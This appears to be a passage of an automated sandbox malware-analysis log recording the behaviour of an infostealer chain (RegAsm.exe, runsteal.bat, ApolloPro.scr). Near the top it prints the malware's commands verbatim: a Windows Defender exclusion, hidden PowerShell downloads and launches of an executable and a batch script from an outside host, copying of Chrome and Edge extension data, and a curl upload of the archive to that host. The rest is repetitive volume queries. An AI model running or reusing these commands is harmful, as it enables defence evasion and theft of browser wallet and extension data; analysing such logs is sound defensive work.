                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\checkmiexe.bat" "Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" "Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\smartscreen.exe "C:\Users\user\AppData\Local\Temp\smartscreen.exe" Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net session
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net session
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c "C:\Users\user\AppData\Local\Temp\downloaded_script.bat"
                                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /E /I "C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Edge\"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip'"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\asm\COMSurrogate.exe "C:\Users\user\AppData\Local\asm\COMSurrogate.exe"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s https://api.ipify.org
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006888CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,18_2_006888CD
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00694F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,18_2_00694F1C
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038D7000.00000004.00000800.00020000.00000000.sdmp, Dr.com, 0000000A.00000000.2139847263.0000000000DB6000.00000002.00000001.01000000.00000007.sdmp, ApolloPro.scr, 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                                  Source: ApolloPro.scrBinary or memory string: Shell_TrayWnd
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0065885B cpuid 18_2_0065885B
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\smartscreen.exe VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
